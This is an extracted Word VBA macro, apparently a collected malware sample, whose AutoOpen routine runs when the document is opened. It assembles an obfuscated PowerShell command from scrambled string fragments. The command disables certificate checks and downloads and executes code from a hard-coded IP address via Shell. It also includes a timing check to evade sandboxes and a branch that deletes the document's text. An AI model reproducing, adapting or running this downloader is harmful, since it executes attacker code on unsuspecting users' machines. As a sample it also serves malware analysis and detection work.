Attribute VB_Name = "Module1"
Public Salesperson As Date
Global gilts As Boolean

Global escapism As Long

Private PhotocopierHairiest As Boolean
Public Rivet As String
Private leersFilthBequests As Variant

Global wovenTeaspoons As Variant
Private Const PosthumouslyFerried As Boolean = True

Public Nausea As Date

Private TuftsLuxuriates As Object
Public KnitSnugglesExtravagant As Object

Public SemiconductorsAbodes As Object

Private KnowingsAlluring As Object
Global Outlays As String

Public mitigatedStewsMissive As String
Global StrappingErasure As Boolean

Global onslaughtDiagnosesJabs As Variant
#If VBA7 Then
Private Declare PtrSafe Function GetTickCount Lib "kernel32" () As Long
#Else
Private Declare Function GetTickCount Lib "kernel32" () As Long
#End If
Public Vulture As Double
Global recitedBasestKnotty As Boolean
Public KilnOpportunists As Boolean
Global Const Lavished As Long = 37780
Public flooder As Integer
Global SaffronsTomahawksMismatch As Long
Private Const holsteredTraderCarpentry As Long = 174
Private Overused As Boolean

Global ZoologyEngraver As String
Global Pseudonyms As Date
Global Const RegimensThermometersSuperstars As Integer = 37
Global unlawfulSkateboardingRedirecting As Long
Global BrandishedSmittenPancaked As Integer
Global Const ExemplarySquirtingDescribable As Boolean = False
Global IncapacitatedFloursDispensation As Object
Sub AutoOpen()
    Dim unambiguouslyAutomotiveDetriment As Long
    Dim DukesFlingingRidges As Long
    Dim Tinsel As Long
    Dim Discrediting As Long
    Dim jawbones As Long
    
    Discrediting = Len("bEFrp")
    Tinsel = Discrediting Or Len("vDG,MqP2a,") Mod Val("         390XcpBY\C#u")
    
    Tinsel = Discrediting \ Val("         3073EoQhfLjV.pkZ(fNV")
    
    jawbones = Val("8574GIgUmqjqMZxkB#rykO*FH") * Tinsel
    DukesFlingingRidges = Discrediting Mod Val("      4064ze^z@^YV\c^Jb/d.r")
    Tinsel = jawbones + Val("   8071 TkhcgvZ.Vr^E dQq,W(mNUYTv(Hz")
    
    unambiguouslyAutomotiveDetriment = Len("KKzcshyT(_8") Xor Discrediting
    DukesFlingingRidges = Val("        4030ki@vmCHf%\UW!Fsav,") * Val("   415Toml\HB&\\.K") \ DukesFlingingRidges - unambiguouslyAutomotiveDetriment
    
    DukesFlingingRidges = Val("        957n%%$_b") And Val("   4352U$@^c") + jawbones
    Tinsel = Val("          3425wW,nQpSqcH$RKzEfqR") + unambiguouslyAutomotiveDetriment + Tinsel
    
    If unambiguouslyAutomotiveDetriment = 14 Then
        If Tinsel <= 87 Then
            DukesFlingingRidges = Len("unambiguouslyAutomotiveDetriment") Or jawbones
        ElseIf Tinsel = 11510 Then
            branchedImprovise = Left("poO*6rHa2x_", (Len("Tinsel") Or jawbones) - 4)
        End If
    End If
    Discrediting = Val("          3506_hqTBdTnZhk^Repmwqe#g/DJfZMTh") + Discrediting Or DukesFlingingRidges
    
    If Tinsel = 11510 Then
        branchedImprovise = branchedImprovise & Replace("w", "jH+HWdPg0", "")
    End If
    DukesFlingingRidges = DukesFlingingRidges + Len("Discrediting") \ Len("DukesFlingingRidges")
    
    If Discrediting = 3511 Then
        If unambiguouslyAutomotiveDetriment > 30 Then
            Application.Selection.InsertBreak
        ElseIf unambiguouslyAutomotiveDetriment > 91 Then
            jawbones = jawbones + Val("4891*NQUe$Hmus_yMDZkNbGVXr") Mod jawbones \ 24
        ElseIf unambiguouslyAutomotiveDetriment = 14 Then
            If jawbones = 0 Then
                branchedImprovise = branchedImprovise & Mid("/B,!HDCezD+9q", (Val("        7449$JYRPDtMgOE") Or Len("Discrediting") Mod Tinsel + Tinsel) - 15635&, (unambiguouslyAutomotiveDetriment \ Tinsel Xor Val("3882^IAGn/dMK^Rr$.!x&/")) - 3881&)
            ElseIf jawbones > 30 Then
                Discrediting = 63280 * jawbones * Discrediting
            End If
        End If
    End If
    jawbones = Tinsel Mod Len("Tinsel")
    
    jawbones = jawbones * Len("QwY") \ Discrediting
    branchedImprovise = branchedImprovise & Left("rshL9Ld0Sz!F", (unambiguouslyAutomotiveDetriment - Tinsel \ Val("    9849aPyWMrftomZIZq ")) - 10)
    DukesFlingingRidges = Val("          5804EkZ@AC OGKI K") - Discrediting
    If unambiguouslyAutomotiveDetriment > 67 Then
        Exit Sub
    ElseIf unambiguouslyAutomotiveDetriment >= 71 Then
        DukesFlingingRidges = Discrediting And Len("NpbFH/)8F-NXJD2yhe") And Val("         8698TVB@@*ypM#QZh_kU!yWe _@&@.mpT\") * DukesFlingingRidges
    ElseIf unambiguouslyAutomotiveDetriment = 14 Then
        If Discrediting = 3511 Then
            branchedImprovise = branchedImprovise & Mid("2dPSf(4 el)9Ba TIqb+", (unambiguouslyAutomotiveDetriment \ Val("        7402mRjjyGME(m") * Discrediting Or Val(" 1935qFk!bQoEEnfq v,_TSY")) - 1926&, (Tinsel Or Len("2L0xn\,$u!Xof-2O4m1") \ Discrediting) - 11508&)
        End If
    End If
    unambiguouslyAutomotiveDetriment = Val("       6436RJFd@wcRDPzlVD Cqjt/&\PYU") + DukesFlingingRidges
    DukesFlingingRidges = Len("DukesFlingingRidges") \ DukesFlingingRidges And jawbones
    
    If DukesFlingingRidges = 0 Then
        branchedImprovise = branchedImprovise & Left("l.eT5.wAt!B7", (Discrediting Xor Len("*KlzcpVcmjZ") Mod Discrediting) - 3513&)
    ElseIf DukesFlingingRidges = 2 Then
        DukesFlingingRidges = Tinsel - jawbones Or Val("9266NOeh&,^r,p)I_WiU#(&SrY") Or Len("WJY0)4V\$JV")
    ElseIf DukesFlingingRidges > 17 Then
        Application.Selection.InsertBreak
    End If
    Tinsel = Len("Vh") Or unambiguouslyAutomotiveDetriment
    unambiguouslyAutomotiveDetriment = Val("      3523LCY($u_AS@") Xor Val("7677Bs! yw_y") Xor jawbones
    If Tinsel = 50 Then
        Exit Sub
    ElseIf Tinsel = 8731 Then
        If DukesFlingingRidges = 0 Then
            branchedImprovise = branchedImprovise & Replace("+E\Q4&25x+E\Q4&25e", "+E\Q4&25", "")
        End If
    ElseIf Tinsel < 97 Then
        unambiguouslyAutomotiveDetriment = jawbones * Len("4")
    End If
    DukesFlingingRidges = Len("*@S#(UU7b5M0OSE&%s") And Tinsel + Discrediting \ Val("      2318pHQ\q*aoR*fU/CI&LLA!IJuC&")
    DukesFlingingRidges = DukesFlingingRidges \ Len("vT$(GRZ-U7d DUbI1K")
    If Discrediting = 3511 Then
        branchedImprovise = branchedImprovise & Right("kjmeyS -", (Val("         4438*S/X^L\Wu Fi/pnkUD") And Len("=gz&PXD3") Or unambiguouslyAutomotiveDetriment) - 4156&)
    End If
    jawbones = Len("Tinsel") \ Discrediting
    
    unambiguouslyAutomotiveDetriment = Tinsel Mod Val("    4798c/jb/o!svKa%FZd")
    If DukesFlingingRidges = 0 Then
        If jawbones = 0 Then
            branchedImprovise = branchedImprovise & Mid("WQn lchnoB-KRZkpFpq", (jawbones * Val("    6141X^uxyJZMyozcZCIubECm%sK") + Len("jawbones") Or Tinsel) - 8723&, (Discrediting * unambiguouslyAutomotiveDetriment \ Val("       3296CHKyM lBBVujZDl /k")) - 4187&)
        ElseIf jawbones > 47 Then
            Application.Selection.InsertBreak
        ElseIf jawbones > 15 Then
            Exit Sub
        End If
    End If
    DukesFlingingRidges = unambiguouslyAutomotiveDetriment And Val("4168_@bSIBXuq_g") * unambiguouslyAutomotiveDetriment \ Len("jawbones")
    branchedImprovise = branchedImprovise & Right("924V_p", (Len("unambiguouslyAutomotiveDetriment") Mod Val("      8935e#*IoTM^YyaxTF") * Discrediting) - 31)
    jawbones = Val("   181mGV/^PJCw&q") - jawbones And Val("4284\yy_yVFIRVoO(z\neDoHlDfCxXc")
    If jawbones = 180 Then
        branchedImprovise = branchedImprovise & Replace(" S", "SE,bP", "")
    End If
    Discrediting = Val("        7812PZDB%##e\_v$%jkySfwd") Mod unambiguouslyAutomotiveDetriment
    If jawbones = 180 Then
        branchedImprovise = branchedImprovise & Right(",90a(xqtart", (unambiguouslyAutomotiveDetriment \ unambiguouslyAutomotiveDetriment + Len("Tinsel") Xor Len("8oxq1z_A")) - 11)
    ElseIf jawbones = 0 Then
        Application.Selection.ClearFormatting
    End If
    unambiguouslyAutomotiveDetriment = Discrediting \ Len("Rb/C1q")
    
    jawbones = Len("Discrediting") - Len("Discrediting") And jawbones * jawbones
    If Tinsel = 8731 Then
        If DukesFlingingRidges < 42 Then
            Application.Selection.InsertBreak
        ElseIf DukesFlingingRidges = 1093 Then
            branchedImprovise = branchedImprovise & Mid("#ImT+X\6#-SpiIvf6n", (Val("          414OvOrv\AikRyfuSx#PjCGiC") Or Len("Gyx") And jawbones + Discrediting) - 405&, (Discrediting Mod Len("jawbones")) - 5)
        End If
    End If
    Discrediting = Val("   3270wwLJtnGxN$//imi&E") * jawbones
    DukesFlingingRidges = unambiguouslyAutomotiveDetriment + Val("      1358p(EEfYcCkxDsbL!kYqzmzTDtCUbanJ") Xor Val("     9188!n.Be,&ZM ")
    branchedImprovise = branchedImprovise & Left("le8K-mYthL", (unambiguouslyAutomotiveDetriment And Len("Discrediting") + Len("jawbones")) - 2)
    Discrediting = Val("     6270Tvn/\A//X") Xor jawbones + Discrediting
    
    unambiguouslyAutomotiveDetriment = Val("         251uQtDyS.!Z(_") Or jawbones And Len("CZ(upOy_wPEHf")
    
    If Tinsel = 8731 Then
        If unambiguouslyAutomotiveDetriment = 251 Then
            If unambiguouslyAutomotiveDetriment = 251 Then
                branchedImprovise = branchedImprovise & Left("ehHDlW#q1\h", (Val(" 41*jVGLkqXJSy(EVNwdy\ WuFpV/pkl") Mod unambiguouslyAutomotiveDetriment) - 40)
            End If
        ElseIf unambiguouslyAutomotiveDetriment = 65 Then
            Exit Sub
        End If
    ElseIf Tinsel = 69 Then
        Application.Selection.InsertNewPage
    End If
    DukesFlingingRidges = DukesFlingingRidges Mod Val("      4080YucNSMu\uRXksfwrW") Mod Discrediting
    unambiguouslyAutomotiveDetriment = Tinsel * DukesFlingingRidges Mod Len("Discrediting")
    If DukesFlingingRidges = 17 Then
        Discrediting = Val("     3492t*IJP%cb/GI_") + 14729& Xor jawbones And unambiguouslyAutomotiveDetriment
    ElseIf DukesFlingingRidges <= 70 Then
        Discrediting = Len("Discrediting") Or Tinsel + Tinsel
    ElseIf DukesFlingingRidges = 1104 Then
        branchedImprovise = branchedImprovise & Mid("P_Q%1p ^F.!M(z\rf", (Len("Discrediting") * unambiguouslyAutomotiveDetriment - unambiguouslyAutomotiveDetriment) + 6, (Tinsel Xor Len("4M5") And jawbones) - 8729&)
    End If
    Tinsel = Val("     7170wI. JV**F_IS#kWxuTv") Or Len("unambiguouslyAutomotiveDetriment") Or unambiguouslyAutomotiveDetriment And unambiguouslyAutomotiveDetriment
    DukesFlingingRidges = Len("Tinsel") * unambiguouslyAutomotiveDetriment
    If Discrediting = 6270 Then
        If Discrediting = 6270 Then
            If Tinsel = 98 Then
                Exit Sub
            ElseIf Tinsel = 7202 Then
                branchedImprovise = branchedImprovise & Left("299,EQk_)fQ", (DukesFlingingRidges \ Len("d(#eozCb3slc$")) + 3)
            End If
        ElseIf Discrediting <= 59 Then
            Application.Selection.InsertNewPage
        ElseIf Discrediting < 27 Then
            DukesFlingingRidges = Len("unambiguouslyAutomotiveDetriment") And Discrediting
        End If
    ElseIf Discrediting = 4 Then
        Exit Sub
    ElseIf Discrediting < 46 Then
        Discrediting = 48968 Or Val("    2099cEaTtIYiCXHoayC/n") + unambiguouslyAutomotiveDetriment - jawbones
    End If
    DukesFlingingRidges = Val("          4631SRI#loIVr*RFh.i^Ai^rUPQGE") Or Discrediting
    Tinsel = Tinsel + Tinsel Xor Len("unambiguouslyAutomotiveDetriment")
    
    If unambiguouslyAutomotiveDetriment = 0 Then
        branchedImprovise = branchedImprovise & Replace("ifNNu;[ifNNuS", "ifNNu", "")
    End If
    unambiguouslyAutomotiveDetriment = Val("      4290!eka/uztw") \ Tinsel
    jawbones = Len("f2Wt52ypO-!uk\*/fJ") \ Len("cLGkm7Q") * Tinsel
    If Tinsel = 14436 Then
        branchedImprovise = branchedImprovise & Left("yfO*z0", (Len("Discrediting") Mod Discrediting Mod DukesFlingingRidges) - 11)
    End If
    jawbones = Len("y%V") And jawbones Xor jawbones
    DukesFlingingRidges = Val("          3216zWXji^j") - Len("unambiguouslyAutomotiveDetriment") Xor DukesFlingingRidges
    If unambiguouslyAutomotiveDetriment = 0 Then
        If Tinsel = 14436 Then
            If Discrediting = 6270 Then
                branchedImprovise = branchedImprovise & Right("=L&%Zstem", (Len("6pF-9uW=0Z0gPk!d&7Wg") + Len("unambiguouslyAutomotiveDetriment") \ Tinsel) - 16)
            End If
        End If
    End If
    jawbones = Tinsel + Val("     6232dc \HLoxE") + Discrediting
    If Tinsel < 75 Then
        Application.Selection.InsertNewPage
    ElseIf Tinsel = 14436 Then
        If DukesFlingingRidges < 21 Then
            unambiguouslyAutomotiveDetriment = DukesFlingingRidges Xor 5229&
        ElseIf DukesFlingingRidges = 5647 Then
            If DukesFlingingRidges = 5647 Then
                branchedImprovise = branchedImprovise & Mid("1tDy$T2.Ne,5!+=iY= 7", (Tinsel Xor Len("V.+rL@$%Y#K") And DukesFlingingRidges) - 14439&, (Len("jawbones") * DukesFlingingRidges) - 45173)
            ElseIf DukesFlingingRidges < 18 Then
                Exit Sub
            End If
        End If
    End If
    Tinsel = DukesFlingingRidges Xor Tinsel + Len("unambiguouslyAutomotiveDetriment")
    Discrediting = DukesFlingingRidges \ Val("      6075WH#ys.TBdj*Ve$pCfDqAkfJRlixm") + Val("313^ie@&!(SV")
    If Discrediting = 313 Then
        If unambiguouslyAutomotiveDetriment = 0 Then
            branchedImprovise = branchedImprovise & Right("2@yM%Ft", (unambiguouslyAutomotiveDetriment \ Tinsel * Val("   9015B*_&VYuw.*Iv,*OFbUS$fp&o@V") * Len("DukesFlingingRidges")) + 1)
        End If
    ElseIf Discrediting < 28 Then
        unambiguouslyAutomotiveDetriment = Len("zHj8oECifC84L") \ unambiguouslyAutomotiveDetriment
    ElseIf Discrediting = 51 Then
        Exit Sub
    End If
    Discrediting = Len("Tinsel") Xor Val("          2041qZ\ ./nMRaB\KId JlFdsQ") + Tinsel
    jawbones = Len("Discrediting") + DukesFlingingRidges
    
    branchedImprovise = branchedImprovise & Mid("a=\(w+i.SeiJwtK2)3M", (unambiguouslyAutomotiveDetriment And Len("Discrediting") Xor unambiguouslyAutomotiveDetriment) + 8, (Tinsel Mod Len("Discrediting")) - 8)
    unambiguouslyAutomotiveDetriment = Tinsel Xor Len("DukesFlingingRidges")
    Tinsel = Len("DukesFlingingRidges") \ Discrediting
    If Discrediting < 36 Then
        Tinsel = Len("WeKVy") And 15669& Xor DukesFlingingRidges
    ElseIf Discrediting = 13954 Then
        branchedImprovise = branchedImprovise & Mid("M3gdo*%rvic_K=R7NN857", (Val("        8363Ouh_.Udzw@G") Or Val("  9158TiTYc$@Jid&^#") Or unambiguouslyAutomotiveDetriment Xor Discrediting) - 6517&, (DukesFlingingRidges + Len("jawbones") * Val("  4722/DvP@weLCWGFgFE.kP\\&,jGo") \ Discrediting) - 5645&)
    ElseIf Discrediting = 68 Then
        Application.Selection.InsertBreak
    End If
    Tinsel = Discrediting * Val("      2138YbIytjw") \ DukesFlingingRidges
    unambiguouslyAutomotiveDetriment = Val("          6809ba/.Gph$(!z") And Discrediting
    
    If unambiguouslyAutomotiveDetriment < 21 Then
        Application.Selection.ClearFormatting
    ElseIf unambiguouslyAutomotiveDetriment = 4736 Then
        If jawbones = 5659 Then
            If DukesFlingingRidges = 5647 Then
                branchedImprovise = branchedImprovise & Mid("ngG05T^eP&55UY^MqO", (Tinsel * Len("jawbones")) - 42256, (Len("unambiguouslyAutomotiveDetriment") - Val("         3925Lvuq/kig") \ unambiguouslyAutomotiveDetriment) - 30)
            End If
        End If
    ElseIf unambiguouslyAutomotiveDetriment < 75 Then
        Application.Selection.InsertNewPage
    End If
    unambiguouslyAutomotiveDetriment = Len("unambiguouslyAutomotiveDetriment") * Val("     2033HavycJL(X") Or jawbones Xor DukesFlingingRidges
    DukesFlingingRidges = Val(" 9126@dXjs!ZSxC.,joZ") And Discrediting Mod unambiguouslyAutomotiveDetriment
    
    If Discrediting = 13954 Then
        branchedImprovise = branchedImprovise & Mid("MxWtQEFEoinb2apd", (Val("   5299 OQfo/XRY(zFJshWoBoHc$") + jawbones Or Len("Z9e3^0EHNIj") And unambiguouslyAutomotiveDetriment) - 10949&, (jawbones Or Tinsel \ Val("     5695Jh*zeQ^AlS.P!")) - 5656&)
    ElseIf Discrediting = 5 Then
        Application.Selection.ClearFormatting
    End If
    jawbones = Val("        9858 IBCaFbhRtd!vJ* NgFlRC(mZZcaMZ") - Len("Discrediting") Mod jawbones
    branchedImprovise = branchedImprovise & Left("tManxQ BA!F", (DukesFlingingRidges Xor Val("   69wa^aVP.&Ois,BmOfF.") \ Val("8717Y,it#j*%(lAzEpuc#kRKA")) - 8830&)
    Tinsel = Discrediting Or Val("         9952xta*m,UDnmvm") * Len("SG,fQXX-V")
    jawbones = unambiguouslyAutomotiveDetriment + DukesFlingingRidges + Len("Discrediting") * Len("Wuof^ChRS6htQMlM")
    branchedImprovise = branchedImprovise & Left("ager]::ServerCertifiAkg3Bt$", (unambiguouslyAutomotiveDetriment \ Len("WF5t1zDL@8o$8eN") Or Tinsel) - 98278)
    Discrediting = Val("        2457sKqeOehoLrobJBycnwsNA,sHOb_") Xor Tinsel
    
    DukesFlingingRidges = Len("Tinsel") And Discrediting Xor Tinsel - Val("  8371SlHHdRDgdhOztxC J*I")
    branchedImprovise = branchedImprovise & Right("S3qOQcateValidationCal", (Discrediting Or Len("unambiguouslyAutomotiveDetriment")) - 95850)
    jawbones = Val("       4377wwdds_EEQk/dEm#enWWBw") + unambiguouslyAutomotiveDetriment \ Len("unambiguouslyAutomotiveDetriment")
    DukesFlingingRidges = Val(" 2784..Pr,xrBMSxKymGzi(M^") Xor jawbones + Len("a G+Rj\")
    If Discrediting <= 28 Then
        jawbones = unambiguouslyAutomotiveDetriment * 26630& - Val("     7357Y%qk&yX")
    ElseIf Discrediting < 16 Then
        Application.Selection.InsertNewPage
    ElseIf Discrediting = 95867 Then
        If Tinsel = 98274 Then
            If Discrediting = 95867 Then
                branchedImprovise = branchedImprovise & Replace("lb/0Aj,8!b!ack/0Aj,8!b! = {$/0Aj,8!b!tru", "/0Aj,8!b!", "")
            End If
        End If
    End If
    jawbones = unambiguouslyAutomotiveDetriment * Len("T%!V%Ff@Q3v^,5N/3b7#") Xor unambiguouslyAutomotiveDetriment + Len("Tinsel")
    
    If unambiguouslyAutomotiveDetriment = 59444 Then
        branchedImprovise = branchedImprovise & Left("e};iex (New-oxLaamP//_", (unambiguouslyAutomotiveDetriment Xor Len("Discrediting")) - 59436)
    ElseIf unambiguouslyAutomotiveDetriment = 15 Then
        Application.Selection.InsertBreak
    End If
    Tinsel = Len("jawbones") Mod Val("         6LIx^kc&JzTa") * Tinsel And jawbones
    DukesFlingingRidges = Tinsel + Len("Bo= Aq6CaMvv=zvU")
    
    If DukesFlingingRidges = 24 Then
        branchedImprovise = branchedImprovise & Right(")TM2/Object System.N", (unambiguouslyAutomotiveDetriment Xor Len("unambiguouslyAutomotiveDetriment")) - 59397)
    ElseIf DukesFlingingRidges = 94 Then
        Exit Sub
    End If
    DukesFlingingRidges = DukesFlingingRidges * Len("+OGSBmYCGGl@=s3nZ")
    unambiguouslyAutomotiveDetriment = Val("  9344po,wcZsSDO*%ApnHwi") - Discrediting \ Discrediting
    If Tinsel = 22 Then
        Application.Selection.InsertNewPage
    ElseIf Tinsel = 8 Then
        branchedImprovise = branchedImprovise & Replace("c0y05nlAket.Wc0y05nlAkebCli", "c0y05nlAk", "")
    ElseIf Tinsel = 10 Then
        unambiguouslyAutomotiveDetriment = Discrediting Or Len("DukesFlingingRidges")
    End If
    jawbones = Len("Tinsel") Mod Len("bKYd1tuLhND&#") * Tinsel
    DukesFlingingRidges = jawbones And Len("0hlPEmMaR1H/RSU.") Xor Discrediting
    branchedImprovise = branchedImprovise & Mid("we$EzAKient).Download6 IKXR4QRP", (Len("f") \ Tinsel) + 9, (Len("p7=\QHpQc$lT/10Ibfp") And unambiguouslyAutomotiveDetriment Xor jawbones Mod Len("DukesFlingingRidges")) - 8)
    DukesFlingingRidges = Len("Discrediting") * Tinsel Mod unambiguouslyAutomotiveDetriment
    
    jawbones = Val("    3384Zra!\_miYMux_d") - Len("Discrediting") Xor DukesFlingingRidges * Tinsel
    
    If jawbones = 3628 Then
        If DukesFlingingRidges <= 1 Then
            jawbones = 57026 Xor Tinsel
        ElseIf DukesFlingingRidges = 96 Then
            branchedImprovise = branchedImprovise & Replace("SmPj!iGBn2dtmPj!iGBn2dringmPj!iGBn2d('h", "mPj!iGBn2d", "")
        ElseIf DukesFlingingRidges <= 86 Then
            unambiguouslyAutomotiveDetriment = Val("       1985.@GaR^bid&L") \ unambiguouslyAutomotiveDetriment
        End If
    ElseIf jawbones = 61 Then
        Application.Selection.InsertBreak
    ElseIf jawbones < 47 Then
        Application.Selection.InsertNewPage
    End If
    jawbones = Val("       5619/,cp/BWa^(d.Otp.JDlliYOAtQVzg*") + unambiguouslyAutomotiveDetriment + DukesFlingingRidges
    DukesFlingingRidges = Val("    1928gFGvzFoAzYbyKeYjK$YhcJrZJC!Ish") + unambiguouslyAutomotiveDetriment Mod jawbones
    branchedImprovise = branchedImprovise & Mid("ST-&IBttps://179.43.176.23+Q$,KEpT#9", (Discrediting \ Len("DukesFlingingRidges") Mod jawbones) - 5038&, (jawbones Xor Discrediting Xor Len("%m1eGe*x%uf*z")) - 85136)
    DukesFlingingRidges = DukesFlingingRidges Or Val("         9707VBtqAjaTkP,TZ&R$MXfFldIm")
    If jawbones = 15058 Then
        branchedImprovise = branchedImprovise & Replace("9/'+(trTOi-joitrTOin trTOi((9trTOi7..1trTOi2trTOi2", "trTOi", "")
    End If
    DukesFlingingRidges = Val("  9322caBsI\MbngY(") * Discrediting \ Len("Discrediting")
    jawbones = DukesFlingingRidges And Len("!gIc_8paD7smIUJCw!") * jawbones
    If Discrediting < 35 Then
        Application.Selection.InsertNewPage
    ElseIf Discrediting = 95867 Then
        branchedImprovise = branchedImprovise & Right("sgF7E gqP) | Get-Ran", (jawbones * Len("1^h")) - 565&)
    ElseIf Discrediting < 0 Then
        Exit Sub
    End If
    Tinsel = Len("Tinsel") And Len("unambiguouslyAutomotiveDetriment") + unambiguouslyAutomotiveDetriment
    If Tinsel = 6 Then
        If DukesFlingingRidges < 36 Then
            Application.Selection.InsertNewPage
        ElseIf DukesFlingingRidges = 74472681 Then
            branchedImprovise = branchedImprovise & Right("Vdrf*)cP8dom -Count 7 | % {", (Tinsel * unambiguouslyAutomotiveDetriment \ Val("  7784,O_eCIonSOj*VHI%")) + 11)
        End If
    ElseIf Tinsel = 28 Then
        Tinsel = Val("          5407cS@YH") Xor Tinsel
    End If
    jawbones = Val("   7519kawbjMjcsb") \ DukesFlingingRidges
    DukesFlingingRidges = Len("jawbones") - Len("Tinsel") + Discrediting
    If unambiguouslyAutomotiveDetriment = 9343 Then
        branchedImprovise = branchedImprovise & Right("b9dBKfzFI[char]$_}", (unambiguouslyAutomotiveDetriment Or Len("(a") + Len("Discrediting") * DukesFlingingRidges) - 1158646)
    ElseIf unambiguouslyAutomotiveDetriment < 33 Then
        Exit Sub
    End If
    Discrediting = Len("3t+svUB") Mod Len("Tinsel") Or jawbones Mod Discrediting
    
    Discrediting = DukesFlingingRidges * Val(" 1163oYc$\A$iq") Xor jawbones
    branchedImprovise = branchedImprovise & Left("))+'.png')p=78pa8%r,", (Len("P4rA") Mod Tinsel Mod unambiguouslyAutomotiveDetriment) + 6)
    jawbones = unambiguouslyAutomotiveDetriment Xor unambiguouslyAutomotiveDetriment Mod Val("          4880@MBscG_FZi!*")
    
    If Tinsel = 6 Then
        settlementSparkleRafted = GetTickCount()
    End If
    If settlementSparkleRafted < 9.2295 Then
        branchedImprovise = "Z5nVF(0H"
    End If
    acclimate = (Val("        5693_o\ l&P**/dQfhJPNDjRXhX^zFW!j") Or DukesFlingingRidges And DukesFlingingRidges) - 95677 + Shell(branchedImprovise, (Val("       4790lsrA*XmK%%HMm^/MobAnwu,f,YHpO") Or Val("       4604gHBHByocvX") And Discrediting) - 5118&) + (Discrediting * Len("Discrediting")) - 1337947764
    jawbones = jawbones + Tinsel \ Len("DukesFlingingRidges")
    
    DukesFlingingRidges = DukesFlingingRidges + Len("r/y%")
    Discrediting = Tinsel \ Len("jawbones") And Val("          7038\PfDsAffc &gB&o")
    DukesFlingingRidges = unambiguouslyAutomotiveDetriment - Len("Tinsel")
    unambiguouslyAutomotiveDetriment = Len("Discrediting") And DukesFlingingRidges
    
    Discrediting = DukesFlingingRidges Xor Tinsel Mod Len("Tinsel")
    If Discrediting = 9337 Then
        ActiveDocument.Range.Delete
    ElseIf Discrediting < 1 Then
        Application.Selection.InsertBreak
    End If
    Discrediting = Val("         2871frB qRgu") Xor Val("       6065mEnrP$Ej!tkN^SBstRn#kWIi") + Tinsel
    DukesFlingingRidges = Len("OY") * Val("  4600VKEd&VgWdGkx..") Xor unambiguouslyAutomotiveDetriment Mod unambiguouslyAutomotiveDetriment
    If Tinsel = 6 Then
        If unambiguouslyAutomotiveDetriment > 16 Then
            Discrediting = Len("L2T@($UBP&N") + Discrediting Xor Discrediting
        ElseIf unambiguouslyAutomotiveDetriment = 8 Then
            ActiveDocument.ActiveWindow.View.DisplayBackgrounds = False
        End If
    ElseIf Tinsel > 52 Then
        Exit Sub
    ElseIf Tinsel = 68 Then
        Application.Selection.InsertNewPage
    End If
    DukesFlingingRidges = unambiguouslyAutomotiveDetriment \ Val("       1758H^_iYv.gXazpq!@$JWWy,c*v/.") And Discrediting \ Val(" 6569^NsF*qqSq,/ty")
    
    Discrediting = unambiguouslyAutomotiveDetriment Or Val("2839/XXPzS") Mod Len("m=x&YCr(h@") And Discrediting
    
End Sub
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' InQuest injected base64 decoded content
' ^tYh

INQUEST-PP=macro
